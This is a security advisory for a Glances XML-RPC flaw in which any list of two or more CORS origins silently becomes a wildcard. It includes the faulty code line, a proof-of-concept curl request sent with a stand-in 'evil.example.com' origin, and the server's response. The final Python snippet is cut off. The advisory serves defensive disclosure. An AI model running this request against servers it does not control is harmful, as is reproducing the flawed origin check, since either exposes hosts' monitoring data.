CVE-2026-46608
Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)
Summary
### Summary The Glances XML-RPC server (`glances -s`) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE 2026-33533. However, the implementation silently falls back to `Access-Control-Allow-Origin: *` whenever `cors_origins` contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard — the same exposure that the original CVE described. A malicious web page served from any origin can issue a CORS simple request to `/RPC2` and read the full system monitoring dataset without the victim's knowledge. --- ### Details **Affected file:** `glances/server.py`, class `GlancesXMLRPCServer`, line 113 **Direct URL (commit 04579778e733d705898a169e049dc84772c852da):** - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py#L113 ```python # server.py (GlancesXMLRPCServer.__init__) cors_origins = self.args.cors_origins # list from config / CLI # Line 113 — the incomplete fix: self.cors_origin = cors_origins[0] if len(cors_origins) == 1 else '*' # ^^^ # Any allowlist with 2+ entries collapses to the wildcard ``` The `cors_origin` value is then echoed back as the `Access-Control-Allow-Origin` response header for every request (line ~147 in the same file): ```python self.send_header('Access-Control-Allow-Origin', self.cors_origin) ``` This means the CORS header is determined once at server startup and never compared against the actual `Origin` header sent by the browser. Even if an operator sets: ```ini # glances.conf [outputs] cors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com ``` the server responds with `Access-Control-Allow-Origin: *` to every request, including those from `https://attacker.example.com`. **Single-origin wildcard** (the default, `cors_origins = *`) is also still in effect; the fix only helps if exactly one non-wildcard origin is configured. **Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). Test results: | Origin sent | ACAO header returned | Expected | |--------------------------|----------------------|--------------| | `http://evil.example.com`| `*` | No header | | `https://dashboard.corp` | `*` | Reflected | | `https://grafana.corp` | `*` | Reflected | --- ### PoC **Special configuration required** The multi-origin collapse is only triggered when `cors_origins` contains two or more entries. Create the following `glances.conf`: ```ini # /tmp/glances_multiorigin.conf [global] check_update = false [outputs] cors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com ``` **Step 1 — Start the XML-RPC server using the config above** ```bash glances -s -p 61209 -C /tmp/glances_multiorigin.conf ``` **Step 2 — Send a CORS simple request from a foreign origin** ```bash curl -s -D - -X POST "http://TARGET_HOST:61209/RPC2" \ -H "Content-Type: text/plain" \ -H "Origin: http://evil.example.com" \ -d ' getAllPlugins ' ``` **Expected (secure) response:** ``` HTTP/1.0 400 Bad Request ``` or no `Access-Control-Allow-Origin` header. **Actual response:** ``` HTTP/1.0 200 OK Access-Control-Allow-Origin: * ... cpu mem ... ``` **Step 3 — Demonstrate the code-level collapse to wildcard** ```python import sys sys.path.insert(0, '/path/to/glances') # adjust to local clone from glances.config import Config c = Config('/tmp/gl
Affected packages
| Ecosystem | Package | Affected versions | Fixed versions |
|---|---|---|---|
| PyPI | glances | — | 4.5.5 |
Remediation: Upgrade to 4.5.5 or later.
References
Includes data from the GitHub Advisory Database, licensed under CC-BY 4.0.
CVE® is a registered trademark of The MITRE Corporation. CVE content reproduced under the CVE Terms of Use; copyright designation © MITRE.
EPSS scores provided by the FIRST.org Exploit Prediction Scoring System.